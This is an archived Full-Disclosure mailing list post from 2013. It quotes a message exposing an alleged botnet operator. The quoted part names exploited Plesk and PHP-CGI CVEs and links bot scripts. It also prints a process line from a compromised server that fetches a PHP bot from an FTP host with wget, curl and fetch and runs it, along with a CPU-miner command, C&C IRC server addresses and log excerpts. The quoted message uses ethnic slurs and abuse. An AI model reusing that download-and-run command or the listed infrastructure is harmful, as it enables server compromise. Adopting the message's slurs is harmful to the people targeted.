lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Tue, 05 Nov 2013 19:40:26 +0100
From: Alex <fd@...oo.de>
To: <pr0n4h4x@....hush.com>, <full-disclosure@...ts.grok.org.uk>
Subject: Re: Geox fails..

I would have changed his mining pool ;)


Am 5. November 2013 13:22:43 schrieb pr0n4h4x@....hush.com:
>
> Geox is just another annoying wannabe hacker and gypsy criminal from
> Romania. He's been around for a few years trying to impress his mom
> and his little gypsy fellas with mad hacking skillz..
> This stupid donkey is currently into teh bitcoins infecting boxes
> through well known Plesk (CVE2013-4878) and PHP-CGI (CVE2012-1823)
> bugs planting a lame bitcoin miner. Who would ever mine on CPUs.. again?!?!
> Whatever, eat shit and die you fuck*ng gypsy!
> 8============D Awes0me FTP s3rv1ng sh1t
> ftp://ftp:wer234234@...79.48.186/
>
> 8============D Awes0me to0lz o' trad3 bot.phphttp://pastebin.com/9hgZ9ZUc
> winbot.phphttp://pastebin.com/wNDedBmU
> winbot2.phphttp://pastebin.com/ibfky3uR
> x.exehttps://malwr.com/analysis/NzFiMTcxMmExYjU4NDdiYTllNDQ0NzcyNGY5OGUzMjA/http://anubis.iseclab.org/?action=result&task_id=13472b0107a54b824518471e7c7b1b873
> updatehttp://pastebin.com/FieAK7yK
> ahttp://pastebin.com/4PVDpkCe
> 8============D Compr0miz3d b0x
> 8769 ?        S      0:00 sh -c cd /tmp ; wget
> ftp://ftp:wer234234@...79.48.186/bot.php ; curl -O
> ftp://ftp:wer234234@...79.48.186/bot.php ; fetch
> ftp://ftp:wer234234@...79.48.186/bot.php; php bot.php ; rm -rf
> bot.php6332 ?        Ssl  550:17 bash -o stratum+tcp://mine.cc.st:3333
> -O geox.1:x -B
> 8============D C&C b0xez
>
> > C&C IRC Server: 67.207.134.147
> root@...aunit:/var/log/apache2# netstat -anp|grep ircd|wc
> -l1251root@...aunit:/var/log/apache2# w23:28:02 up 356 days,  5:18,  0
> users,  load average: 3.57, 3.70, 3.65USER     TTY      FROM    LOGIN@   
> IDLE   JCPU   PCPU WHAT
> > C&C IRC Server: 67.207.128.106 (ircd.port0.org < Registered through
> afraid.org)
> # w10:06:48 up 605 days, 17:59,  0 users,  load average: 0.00, 0.00,
> 0.00USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU
> WHAT# netstat -anp|grep ircd|grep ESTABLISHED|wc -l2393
> # grep -i total-securite.net ircd.log[Mon Nov  4 05:22:59 2013] -
> Connect - Geox!Geox@...al-securite.net[Mon Nov  4 05:23:13 2013] -
> OPER (Geox) by (Geox!Geox@...al-securite.net)[Mon Nov  4 05:26:12
> 2013] - Disconnect - (0:3:15) Geox!Geox@...al-securite.net

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ